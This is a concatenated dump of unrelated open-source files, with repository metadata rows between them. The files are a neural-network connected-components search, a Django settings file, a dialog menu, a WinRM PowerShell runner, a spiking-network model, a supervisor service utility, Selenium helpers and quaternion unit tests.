test_model.params = sess.run(test_model.weightslist), sess.run(test_model.biaseslist)
step += 1
#Connected components search
#Used for softening the training criteria. There's some fuzz required due to the difference in
#training error between test and training
thresh_multiplier = 1.1
results = []
connecteddict = {}
for i1 in xrange(len(models)):
connecteddict[i1] = 'not connected'
test = WeightString(models[0].params[0],models[0].params[1],models[1].params[0],models[1].params[1],1,1)
for i1 in xrange(len(models)):
print i1
for i2 in xrange(len(models)):
if i2 > i1 and ((connecteddict[i1] != connecteddict[i2]) or (connecteddict[i1] == 'not connected' or connecteddict[i2] == 'not connected')) :
#print "slow1?"
#print i1,i2
#print models[0]
#print models[1]
#print models[0].params
#print models[1].params
#test = WeightString(models[i1].params[0],models[i1].params[1],models[i2].params[0],models[i2].params[1],1,1)
training_threshold = thresh
depth = 0
d_max = 10
#Check error between beads
#Alg: for each bead at depth i, SGD until converged.
#For beads with max error along path too large, add another bead between them, repeat
#Keeps track of which indices to check the interpbeaderror between
newindices = [0,1]
while (depth < d_max):
print newindices
#print "slow2?"
#X, y = GenTest(X,y)
counter = 0
for i,c in enumerate(test.ConvergedList):
if c == False:
#print "slow3?"
error = test.SGDBead(i, .98*training_threshold, 20)
#print "slow4?"
#if counter%5000==0:
# print counter
# print error
test.ConvergedList[i] = True
print test.ConvergedList
interperrors = []
interp_bead_indices = []
for b in xrange(len(test.AllBeads)-1):
if b in newindices:
e = InterpBeadError(test.AllBeads[b][0],test.AllBeads[b][1], test.AllBeads[b+1][0], test.AllBeads[b+1][1])
interperrors.append(e)
interp_bead_indices.append(b)
print interperrors
if max([ee[0] for ee in interperrors]) < thresh_multiplier*training_threshold:
depth = 2*d_max
#print test.ConvergedList
#print test.SpringNorm(2)
#print "Done!"
else:
del newindices[:]
#Interperrors stores the maximum error on the path between beads
#shift index to account for added beads
shift = 0
for i, ie in enumerate(interperrors):
if ie[0] > thresh_multiplier*training_threshold:
k = interp_bead_indices[i]
ws,bs = model_interpolate(test.AllBeads[k+shift][0],test.AllBeads[k+shift][1],\
test.AllBeads[k+shift+1][0],test.AllBeads[k+shift+1][1],\
ie[1]/20.)
test.AllBeads.insert(k+shift+1,[ws,bs])
test.ConvergedList.insert(k+shift+1, False)
newindices.append(k+shift+1)
newindices.append(k+shift)
shift+=1
#print test.ConvergedList
#print test.SpringNorm(2)
#print d_max
depth += 1
if depth == 2*d_max:
results.append([i1,i2,test.SpringNorm(2),"Connected"])
if connecteddict[i1] == 'not connected' and connecteddict[i2] == 'not connected':
connecteddict[i1] = i1
connecteddict[i2] = i1
if connecteddict[i1] == 'not connected':
connecteddict[i1] = connecteddict[i2]
else:
if connecteddict[i2] == 'not connected':
connecteddict[i2] = connecteddict[i1]
else:
if connecteddict[i1] != 'not connected' and connecteddict[i2] != 'not connected':
hold = connecteddict[i2]
connecteddict[i2] = connecteddict[i1]
for h in xrange(len(models)):
if connecteddict[h] == hold:
connecteddict[h] = connecteddict[i1]
else:
results.append([i1,i2,test.SpringNorm(2),"Disconnected"])
#print results[-1]
uniquecomps = []
totalcomps = 0
for i in xrange(len(models)):
if not (connecteddict[i] in uniquecomps):
uniquecomps.append(connecteddict[i])
if connecteddict[i] == 'not connected':
totalcomps += 1
#print i,connecteddict[i]
notconoffset = 0
if 'not connected' in uniquecomps:
notconoffset = -1
#with open('DSSCIFAR.' + str(thresh) + '.' + str(num_run) + '.out','w+') as f:
print "Thresh: " + str(thresh) + "\n"
print "Comps: " + str(len(uniquecomps) + notconoffset + totalcomps) + "\n"
connsum = []
for r in results:
if r[3] == "Connected":
connsum.append(r[2])
#print r[2]
print "***\n"
print str(len(test.AllBeads)) + "\n"
print "\t".join([str(s) for s in connsum[0]])
#print np.average(connsum)
#print np.std(connsum)
| mit | -1,522,237,430,314,512,100 | 29.982571 | 144 | 0.615123 | false |
neqelr17/banknotes | banknotes/settings.py | 1 | 3207 | """
Django settings for banknotes project.
Generated by 'django-admin startproject' using Django 1.9.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'm@hb1flp0z#d@+#(l=2^ox!(945_4o7(q5$3c2___h18$m=ad5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'budget.apps.BudgetConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'banknotes.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'banknotes.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| gpl-3.0 | -6,370,282,057,669,393,000 | 25.286885 | 91 | 0.688806 | false |
berserkerbernhard/Lidskjalv | code/networkmonitor/modules/groups/grouplistmenu.py | 1 | 2968 | import os
import time
import dialog
from modules.sitegrouphosttools import SiteGroupHostTools
from modules.groups.group import Group
from modules.groups.groupform import GroupForm
from modules.groups.groupmenu import GroupMenu
from modules.sitegrouphosttools import get_group_members
class GroupListMenu(SiteGroupHostTools):
def __init__(self):
self.d = dialog.Dialog(dialog="dialog")
self.storage_path = os.path.expanduser("~/LidskjalvData")
self.g = Group()
self.gf = GroupForm()
self.gm = GroupMenu()
self.sght = SiteGroupHostTools()
def show_menu(self, site):
while True:
menu = self.build_menu(site)
sz = os.get_terminal_size()
s = "Select a group or action in site '%s'" % site
code, tag = self.d.menu(s,
title="Site: '%s' - Groups menu" % site,
height=sz.lines - 5,
width=sz.columns - 8,
menu_height=sz.lines - 15,
backtitle="Lidskjalv",
choices=menu)
if code == self.d.OK:
r = self.process_menu(site, tag)
if r is None:
break
else:
break
def build_menu(self, site):
sp = self.storage_path
if not self.g.group_exist(site, 'Cisco Switches'):
self.g.create_group(site,
'Cisco Switches',
"",
int(time.time()),
[])
if not self.g.group_exist(site, 'MAC exempt'):
self.g.create_group(site,
'MAC exempt',
"",
int(time.time()),
[])
if not self.g.group_exist(site, 'Nagios'):
self.g.create_group(site,
'Nagios',
"",
int(time.time()),
[])
listofgroups = self.g.list_of_groups_by_name(site)
menu = []
menu.append(["AG", "Add group"])
menu.append(["Q", "Quit"])
menu.append(["", " "])
for group in listofgroups:
memberslist = get_group_members(sp, site, group)
ml = len(memberslist)
gd = self.g.get_group_description(site, group)
d = "%s Member(s) - %s" % (str(ml).rjust(3), gd)
menu.append([group, d])
return menu
def process_menu(self, site, tag):
if tag == "Q":
return None
if tag == "AG":
self.gf.group_form(site, None)
if tag in self.g.list_of_groups(site):
self.gm.show_menu(site, tag)
return True
| gpl-3.0 | -3,861,360,141,004,099,600 | 36.56962 | 76 | 0.453504 | false |
bielawb/PSConfAsia17-Linux | Scripts/httpsWinRM.py | 1 | 2125 | #!/usr/bin/env python
# coding: utf-8
import getpass
from re import search
from subprocess import Popen, PIPE
from winrm import Session
from sys import exit, argv
if len(argv) < 2 :
exit('Sposób użycia: %s <polecenie>' % argv[0])
polecenie = " ".join(argv[1:])
exitCode = 0
class PowerShellError(Exception):
pass
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def uruchom_ps(polecenie):
sesja = Session(
'https://jumpbox.monad.net:5986',
auth = (None, None),
transport = 'kerberos',
kerberos_delegation = True,
server_cert_validation = 'ignore'
)
try:
wynik = sesja.run_ps(polecenie)
print wynik.std_out
if wynik.status_code > 0:
raise PowerShellError(wynik.std_err)
else:
print "%sPolecenie zwróciło kod 0 %s" % (bcolors.OKGREEN, bcolors.ENDC)
except:
raise
def zaloguj():
login = "%[email protected]" % getpass.getuser()
kinit = Popen(['kinit', login, '-l', '1h', '-f'], stdin = PIPE, stdout = PIPE, stderr = PIPE)
kinit.stdin.write('%s\n' % getpass.getpass('Podaj hasło: '))
kinit.wait()
try:
uruchom_ps(polecenie)
except PowerShellError as pse:
print "PowerShell zwrócił błąd:\n%s%s%s" % (bcolors.FAIL, pse, bcolors.ENDC)
exitCode = 1
except Exception as e:
print "Wyjątek:\n%s%s%s" % (bcolors.FAIL, e, bcolors.ENDC)
if search('No Kerberos credentials available', e.message):
print "Błąd wskazuje na konieczność zalogowania..."
try:
zaloguj()
uruchom_ps(polecenie)
except Exception as e:
print "%sNie udało się uruchomić polecenia '%s'. Prawdopodobnie podano nieprawidłowe hasło, bądź użytkownik nie ma odpowiednich uprawnień." % (bcolors.FAIL, polecenie)
print "Błąd: %s %s" % (e, bcolors.ENDC)
exitCode = 2
else:
exitCode = 3
finally:
exit(exitCode)
| mit | 7,049,195,507,617,604,000 | 28.577465 | 179 | 0.603333 | false |
adityagilra/2015_spiking_population_response | ExcInhNetflex.py | 1 | 5096 | # -*- coding: utf-8 -*-
"""
Spiking neural net of LIF/SRM neurons with AI firing
written by Aditya Gilra (c) July 2015.
"""
from brian2 import * # also does 'from pylab import *'
from embedded_consts import *
import random
## Cannot make this network a Class,
## since brian standalone mode wants all Brian objects to be in the same scope.
###### neuronal constants
#nrn_type = 'LIF' # Leaky Integrate-and-Fire
#nrn_type = 'SRM' # Spike Response Model
nrn_type = 'SRM0' # Spike Response Model exact renewal
R = 1.0e8*ohm
tausynE = 100.0*ms # synaptic tau exc->exc
tausyn = 10.0*ms # synaptic tau for all else
tau0 = 20.0*ms # membrane tau
tau0SI = tau0/second
noise = 20.0*mV
uth = 10.0*mV
uth_base = 0.0*mV
refrT = 0.5*ms
###### network constants
C = 100 # Number of incoming connections on each neuron (exc or inh)
fC = fexc # fraction fC incoming connections are exc, rest inhibitory
excC = int(fC*C) # number of exc incoming connections
if nrn_type == "LIF":
I0base = 10.5*mV/R # base current to all neurons at all times
J = 0.8*mV/R*(10*ms/tausynE)
else:
I0base = 0.0*mV/R # base current to all neurons at all times
J = 0.8*mV/R*(10*ms/tausynE)
# exc strength is J (/R as we multiply by R in eqn)
# Critical J (for LIF network with delta synapses) is
# ~ 0.45e-3 V in paper for N = 10000, C = 1000
# Note individual rate fluctuations
# for J = 0.2e-3 V vs J = 0.8e-3 V
# For SRM/SRM0, synaptic filtering but no u integration
# In Ostojic 2014 / Brunel 2000, u integration,
# but no synaptic filtering.
# Both are equivalent if tausyn and membrane tau are same.
# But LIF with synaptic filtering is different
g = 5.0*tausynE/tausyn # if all exc syns have tausynE
#g = 5.0*(tausynE/tausyn)**2 # if only exc->exc syns have tausynE, but exc->inh is tausyn
# -gJ is the inh strength. For exc-inh balance g >~ f(1-f)=4
# a tausynE/tausyn factor is also needed to compensate tau-s
# ###########################################
# Brian network creation
# ###########################################
# reset eta acts as a threshold increase
if nrn_type == "LIF": # LIF
model_eqns = """
du/dt = 1/tau0*(-u + (Ibase + KE + K) * R + deltaItimed( t, i )) : volt
Ibase : amp
dKE/dt = -KE/tausynE : amp
dK/dt = -K/tausyn : amp
"""
threshold_eqns = "u>=uth"
reset_eqns = "u=0*mV"
else: # SRM
model_eqns = """
u = (Ibase + KE + K) * R + deltaItimed( t, i ): volt
Ibase : amp
deta/dt = -eta/tau0 : volt
dKE/dt = -KE/tausynE : amp
dK/dt = -K/tausyn : amp
"""
threshold_eqns = "rand()<=1.0/tau0*exp((u-(eta+uth_base))/noise)*tstep"
if nrn_type == "SRM0": # SRM0 (exact renewal process)
reset_eqns = "eta=uth"
else: # usual SRM (approx as quasi-renewal process)
reset_eqns = "eta+=uth"
# the hazard function rho is the firing rate,
# in time dt the probability to fire is rho*dt.
# noise below is only the output noise,
# input spiking noise comes from spiking during the simulation
Nrns = NeuronGroup(Nbig, model_eqns, \
threshold=threshold_eqns,\
reset=reset_eqns,
refractory = refrT)
Nrns.Ibase = I0base # constant input to all inputs
# there is also transient input above
if nrn_type == 'LIF':
Nrns.u = uniform(0.0,uth/volt,size=Nbig)*volt
# for LIF, u is distibuted
else:
Nrns.eta = uth # initially, all SRM neurons are as if just reset
# brain2 code to make, connect and weight the background synapses
con = Synapses(Nrns,Nrns,'''w : amp
useSynE : 1''',\
pre='KE += useSynE*w; K += (1-useSynE)*w')
## Connections from some Exc/Inh neurons to each neuron
random.seed(100) # set seed for reproducibility of simulations
seed(100)
conn_i = []
conn_j = []
for jidx in range(0,Nbig):
## draw excC number of neuron indices out of NmaxExc neurons
preIdxsE = random.sample(range(NEbig),excC)
## draw inhC=C-excC number of neuron indices out of inhibitory neurons
preIdxsI = random.sample(range(NEbig,Nbig),C-excC)
## connect these presynaptically to i-th post-synaptic neuron
## choose the synapses object based on whether post-syn nrn is exc or inh
conn_i += preIdxsE
conn_j += [jidx]*excC
conn_i += preIdxsI
conn_j += [jidx]*(C-excC)
con.connect(conn_i,conn_j)
con.delay = syndelay
con.useSynE['i<NEbig'] = 1.0
con.w['i<NEbig'] = J
con.w['i>=NEbig'] = -g*J
#con.w = -g*J # kind of winner take all, gives switching
| gpl-3.0 | 5,565,042,228,597,522,000 | 39.768 | 89 | 0.562991 | false |
arozumenko/locust | locust/serviceutils/unixserviceutil.py | 1 | 13419 | # Copyright (c) 2014 Artem Rozumenko ([email protected])
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service util functionality. """
__author__ = 'Mykhailo Makovetskiy - [email protected]'
import os
import sys
from subprocess import Popen
from time import sleep
from copy import deepcopy
from configobj import ConfigObj
import locust.serviceutils.baseserviceutil as baseutil
from locust.serviceutils import (SUPERVISORD_CONF_PATH, SUPERVISORD_CONF_EXT,
CONFIG_STORAGE, EXIT_CODE)
from locust.serviceutils.baseserviceutil import ErrMsg as BaseErrMsg
SUPERV_CMD_TMPL = {'add': 'supervisorctl add {name}',
'avail': 'supervisorctl avail',
'remove': 'supervisorctl remove {name}',
'start': 'supervisorctl start {name}',
'stop': 'supervisorctl stop {name}',
'status': 'supervisorctl status {name}',
'restart': 'supervisorctl restart {name}',
'reload': 'supervisorctl reload',
'reread': 'supervisorctl reread',
'update': 'supervisorctl update'}
#pylint: disable=R0903
class ErrMsg(object):
"""Service error messages."""
bad_super_cmd = ('Supervisor application does not contains given '
'command = {cmd}.\n Available command:\n{cmds}\n')
srv_no_installed = ('ERROR: The service {name} is not installed. '
'Run command install before\n')
#pylint: disable=R0921
class UnixServiceUtil(baseutil.BaseServiceUtil):
""" Unix service util class.
Provides functionality that allows to create, monitor and control a
number of any locust processes by supervisor on UNIX-like operating
systems.
Note:
UnixServiceUtil subclasess can realise the following methods:
enable(self) - Enable autostart locust service at
supervisor start.
disable(self) - Disable autostart locust service at supervisor
start.
"""
def __init__(self, runner, name):
"""UnixServiceUtil constructor.
Args:
runner (types.ClassType, types.FunctionType): Object that run
mainloop cycle of an service.
name (str): Name of a service in supervisor.
"""
super(UnixServiceUtil, self).__init__(runner, name)
self.cmds = dict((k, v.format(name=name)) for k, v
in SUPERV_CMD_TMPL.items())
self.super_conf_path = SUPERVISORD_CONF_PATH
self.super_conf_ext = SUPERVISORD_CONF_EXT
def _check_supervisord_path(self):
"""Check if Supervisor is installed properly."""
if self.super_conf_path is None:
sys.stderr.write(('The Supervisord config does not exist or'
'wrong. The Supervisord application is not '
'installed or not configured properly.'))
sys.exit(EXIT_CODE)
def _create_supervisord_config(self, **kwargs):
"""Create a locust module supervisor configuration file.
Templates is placed in global CFG_TML object. CFG_TML is
instance of ServiceConfig class from serviceconfig.
Args:
**kwargs: Format template arguments.
"""
self._check_supervisord_path()
self._create_config('supervisord', self.super_conf_path,
self.super_conf_ext, **kwargs)
def _remove_supervisord_conf(self):
"""Remove a locust module supervisor configuration file."""
self._check_supervisord_path()
cfg_file = os.path.join(self.super_conf_path,
self.name + self.super_conf_ext)
self._rm(cfg_file, del_empty_par_dir=False)
def _is_installed(self, stderr=True):
"""Checks if a locust service is installed in supervisor.
Args:
stderr (bool): Set quiet check validation if False.
Returns:
bool: True if a locust service is installed.
"""
echo = self._avail_srv()
installed = True if self.name in echo else False
if not installed and stderr:
sys.stderr.write(ErrMsg.srv_no_installed.format(name=self.name))
return installed
def _runsupervisor_cmd(self, command, stderr=True):
"""Run supervisor shell command.
Args:
command (str): supervisor command.
stderr (bool): Set quiet check validation if False.
Returns:
str: Supervisor command output.
"""
cmd = str(command)
if cmd not in self.cmds:
commands = '\n'.join(SUPERV_CMD_TMPL.keys())
sys.stderr.write(ErrMsg.bad_super_cmd.format(cmd=cmd,
cmds=commands))
return
try:
echo = Popen(self.cmds[command].split(' '), stdout=-1,
stderr=-2)
echo = echo.communicate()[0]
except OSError as err:
msg = ('ERROR: During run command - {cmd} shell returns error '
'- {err}.\n')
sys.stderr.write(msg.format(cmd=command, err=str(err.message)))
sys.exit(EXIT_CODE)
if stderr:
sys.stdout.write(str(echo))
return echo
def _avail_srv(self):
"""Return available supervisor process.
Returns:
str: Supervisor available command output.
"""
return self._runsupervisor_cmd('avail', stderr=False)
def _add_srv(self):
"""Add process to the supervisor .
Returns:
str: Supervisor add command output.
"""
return self._runsupervisor_cmd('add')
def _reread(self):
"""Update configs all process controlled by supervisor.
Configs updates without process restart.
Returns:
str: Supervisor reread command output.
"""
return self._runsupervisor_cmd('reread')
def _remove(self):
"""Remove a locust service from supervisor.
Returns:
str: Supervisor remove command output.
"""
return self._runsupervisor_cmd('remove')
def _reload(self):
"""Remove a locust process from supervisor.
Returns:
str: Supervisor reread command output.
"""
return self._runsupervisor_cmd('reload')
def _is_running(self):
"""Checks if a supervisor locust service running.
Returns:
bool: True if service running.
"""
return 'RUNNING' in self._runsupervisor_cmd('status', stderr=False)
def _is_stopped(self):
"""Checks if a supervisor locust service stopped.
Returns:
bool: True if service stopped.
"""
return 'Stopped' in self._runsupervisor_cmd('status', stderr=False)
def service_install(self, **kwargs):
"""Install a locust service into supervisor.
Args:
**kwargs: Format templates arguments.
"""
if self._is_installed(stderr=False):
self.service_remove()
if not os.path.exists(self.key_path):
return "Create a secret key first"
self._create_module_config(**kwargs)
self._create_supervisord_config(**kwargs)
self._reread()
self._add_srv()
self._reload()
def _update(self):
"""Restarts the service whose configuration has changed.
Configs updates without process restart.
Returns:
str: Supervisor update command output.
"""
return self._runsupervisor_cmd('update')
def service_stop(self):
"""Stop running locust service.
Returns:
str: Supervisor stop command output.
"""
return self._runsupervisor_cmd('stop')
def service_start(self):
"""Start running locust service.
Returns:
str: Supervisor start command output.
"""
return self._runsupervisor_cmd('start')
def service_restart(self):
"""Restart service without making configuration changes.
It stops, and re-starts all managed applications.
Returns:
str: Supervisor start command output.
"""
return self._runsupervisor_cmd('restart')
def service_status(self):
"""Get status of a installed locust service.
Returns:
str: Supervisor status command output.
"""
return self._runsupervisor_cmd('status')
def service_remove(self):
"""Remove a locust service ."""
if self._is_installed():
if self._is_running():
self.service_stop()
self._remove()
self._remove_supervisord_conf()
self._remove_secure_key()
self._remove_module_conf()
self._reload()
class LocustService(UnixServiceUtil):
"""The locust agent Unix supervisor service util."""
TIMEOUT_DELTA = 0.5 # second
def __init__(self, runner, name, **kwargs):
"""Constructor.
Args:
runner (types.ClassType, types.FunctionType): Object that run
mainloop cycle of an service.
name (str): Name of a service in supervisor.
kwargs (dict): Install options.
"""
self.install_opt = kwargs or {}
super(LocustService, self).__init__(runner, name)
self.install_opt['service_name'] = self.name
self.install_opt['service_path'] = self.runner_path
# pylint: disable=W0221
def service_install(self, **kwargs):
"""Install a locust module as supervisor service.
Args:
**kwargs: Custom install options.
"""
inst_opt = deepcopy(self.install_opt)
inst_opt.update(kwargs)
# pylint: disable=W0142
print super(LocustService, self).service_install(**inst_opt)
def _change_supervisor_autostart(self, value):
""" Change autostart parameter in supervisor config file."""
cfg_path = os.path.join(self.super_conf_path,
self.name + self.super_conf_ext)
section = CONFIG_STORAGE.get_config(self.name, 'supervisord')
if not section:
sys.stderr.write(BaseErrMsg.cfg_tmpl_key.format(
cfg=self.name, name='supervisord'))
sys.exit(EXIT_CODE)
section = section[0]['section'].format(service_name=self.name)
self._change_cfg_prm(cfg_path, section, 'autostart', value)
def service_disable(self):
"""Disable autostart the locust agent service."""
if self._is_installed():
if self._is_running():
self.service_stop()
self._change_supervisor_autostart('false')
def service_enable(self):
"""Enable autostart the locust agent service."""
if self._is_installed():
if self._is_running():
self.service_stop()
self._change_supervisor_autostart('true')
self.service_start()
def service_start(self):
"""Start the locust agent service."""
if self._is_installed(stderr=False):
mconf = os.path.join(self.mod_conf_path,
self.name + self.mod_conf_ext)
msg = 'Config file {path} does not exist'.format(
path=mconf)
assert os.path.exists(mconf), msg
mconf = ConfigObj(mconf)
if not self._is_running():
kwargs = deepcopy(self.install_opt)
kwargs.update(
{'log_out_path': mconf['general']['log_out_path'],
'log_err_path': mconf['general']['log_err_path'],
'autostart': True})
if not os.path.exists(kwargs['log_out_path']):
os.makedirs(kwargs['log_out_path'])
if not os.path.exists(kwargs['log_err_path']):
os.makedirs(kwargs['log_err_path'])
# pylint: disable=W0142
self._create_supervisord_config(**kwargs)
super(LocustService, self).service_start()
print 'checking status...'
# Timeout before check real service status should be more then
# 'startsecs'(default value is 1 sec) option value described in
# process supervisor config file;
# This functionality has moved to the end of class bserviceutil
# since other modules may not need it.
timeout = mconf['startsecs'] if 'startsecs' in mconf else 1.0
timeout += self.TIMEOUT_DELTA
sleep(timeout)
self.service_status()
def service_restart(self):
"""Restart the locust agent service."""
self.service_stop()
self.service_start()
| apache-2.0 | -7,804,406,327,212,588,000 | 32.5475 | 77 | 0.585066 | false |
wavesoft/LiveQ | liveq-agent/tests.py | 1 | 2485 | #!/usr/bin/python
################################################################
# LiveQ - An interactive volunteering computing batch system
# Copyright (C) 2013 Ioannis Charalampidis
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
################################################################
# ----------
import sys
sys.path.append("../liveq-common")
# ----------
import time
import logging
from agent.io.jobmanagers import JobManagers
from agent.config import Config
from liveq.exceptions import ConfigException
from liveq.reporting.postmortem import PostMortem
from liveq import handleSIGINT, exit
# Prepare runtime configuration
runtimeConfig = { }
# Load configuration
try:
Config.fromFile( "config/agent.conf.local", runtimeConfig )
except ConfigException as e:
print("ERROR Configuration exception: %s" % e)
exit(1)
# Hook sigint -> Shutdown
handleSIGINT()
# Setup post-mortem
PostMortem.addGlobalConfig("global", Config)
PostMortem.addGlobalInfo("version", "2.0")
# Prepare post-mortem
from subprocess import Popen, PIPE
pm = PostMortem()
p = Popen(["C:\\windows\\system32\\help.exe"], stdout=PIPE)
pm.addProcess("C:\\windows\\system32\\help.exe", p, stdout=True)
time.sleep(2)
pm.complete()
print pm.sections
a = str(pm.sections)
print pm.toBuffer()
b = pm.toBuffer()
print "dump=%i, compress=%i" % (len(a),len(b))
# EXIT
exit(0)
# Banner
logging.info("Starting agent tests %s" % Config.UUID)
# Login to the server
jobmanagers = JobManagers( Config.SERVER_CHANNEL )
def hsFunction(channel):
logging.info("Sending handshake to %s" % channel.name)
channel.send('handshake', {
'version': 2,
'slots': 0,
'free_slots': 0,
'group': 'debug'
})
jobmanagers.handshakeFn(hsFunction)
# Pick JIDs
while True:
jobmanagers.process(0.5)
print "--- Agent: %s" % jobmanagers.jid()
| gpl-2.0 | 7,826,109,199,466,112,000 | 25.157895 | 81 | 0.694567 | false |
HazenBabcock/brigl | test/driver.py | 1 | 2249 | #!/usr/bin/env python
"""
This returns an automated web browser to use for automated testing. It also
includes some utility functions.
https://www.seleniumhq.org/
http://selenium-python.readthedocs.io/
"""
import time
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# Web browser interface.
def getDriver():
"""
This is configured to use Chrome, change as desired.
"""
desired = DesiredCapabilities.CHROME
desired['loggingPrefs'] = {'browser' : 'ALL'}
options = webdriver.ChromeOptions()
options.add_argument("--window-size=1000,1000")
driver = webdriver.Chrome(executable_path="./chromedriver",
desired_capabilities = desired,
chrome_options = options)
return driver
# Utility functions.
class BRIGLTestException(Exception):
pass
def noSevereErrors(driver, ignore_404 = []):
"""
ignore_404 - A list of files for which it is okay if they are missing.
"""
ignore_404.append("favicon.ico")
log_data = driver.get_log('browser')
severe_errors = parseLog(log_data)
if (len(severe_errors) > 0):
is_severe = False
for s_err in severe_errors:
is_ignored = False
for i_404 in ignore_404:
if (i_404 in s_err['message']):
is_ignored = True
break
if not is_ignored:
is_severe = True
break
if is_severe:
print("Severe error(s) detected:")
for elt in severe_errors:
print(elt)
raise BRIGLTestException("Severe error(s) detected.")
def parseLog(log_data, level = 'SEVERE'):
"""
Return only those messages with the specified level.
"""
temp = []
for elt in log_data:
if (elt['level'] == level):
temp.append(elt)
return temp
def pprintLog(log_data):
"""
Pretty print log messages.
"""
for elt in log_data:
print(elt)
if (__name__ == "__main__"):
driver = getDriver()
print("version is", driver.capabilities['version'])
driver.close()
| gpl-3.0 | -7,560,753,491,243,775,000 | 24.850575 | 80 | 0.582926 | false |
ctogle/dilapidator | test/geometry/quat_tests.py | 1 | 6809 | from dilap.geometry.quat import quat
from dilap.geometry.vec3 import vec3
import dilap.geometry.tools as dpr
import matplotlib.pyplot as plt
import unittest,numpy,math
import pdb
#python3 -m unittest discover -v ./ "*tests.py"
class test_quat(unittest.TestCase):
def test_av(self):
a = 3*dpr.PI4
u1,u2,u3 = vec3(1,0,0),vec3(0,-1,0),vec3(0,0,1)
q1,q2 = quat(0,0,0,0).av(a,u1),quat(0,0,0,0).av(a,u2)
q3,q4 = quat(0,0,0,0).av(-a,u3),quat(0,0,0,0).av(-a,u2)
self.assertTrue(q1.w > 0.1)
self.assertTrue(q1.x > 0.1)
self.assertTrue(dpr.isnear(q1.y,0))
self.assertTrue(dpr.isnear(q1.z,0))
self.assertTrue(q2.w > 0.1)
self.assertTrue(dpr.isnear(q2.x,0))
self.assertTrue(q2.y < -0.1)
self.assertTrue(dpr.isnear(q2.z,0))
self.assertTrue(q3.w > 0.1)
self.assertTrue(dpr.isnear(q3.x,0))
self.assertTrue(dpr.isnear(q3.y,0))
self.assertTrue(q3.z < -0.1)
self.assertFalse(q2 == q4.cp().flp())
self.assertTrue(q2 == q4.cnj())
def test_uu(self):
u1,u2,u3 = vec3(1,0,0),vec3(0,-1,0),vec3(0,0,1)
q1,q2 = quat(0,0,0,0).uu(u1,u2),quat(0,0,0,0).uu(u1,u3)
q3,q4 = quat(0,0,0,0).uu(u2,u3),quat(0,0,0,0).uu(u3,u2)
self.assertTrue(q1.w > 0.1)
self.assertTrue(dpr.isnear(q1.x,0))
self.assertTrue(dpr.isnear(q1.y,0))
self.assertTrue(q1.z < -0.1)
self.assertTrue(q2.w > 0.1)
self.assertTrue(dpr.isnear(q2.x,0))
self.assertTrue(q2.y < -0.1)
self.assertTrue(dpr.isnear(q2.z,0))
self.assertTrue(q3 == q4.cnj())
def test_toxy(self):
q1 = quat(0,0,0,0).toxy(vec3(0,0,-1))
#print('toxy\v\t',q1)
self.assertEqual(q1.w,0)
self.assertEqual(q1.x,1)
def test_cp(self):
q1 = quat(1,2,3,4)
self.assertTrue(q1 is q1)
self.assertFalse(q1 is q1.cp())
self.assertTrue(q1 == q1.cp())
#def test_cpf(self):
def test_isnear(self):
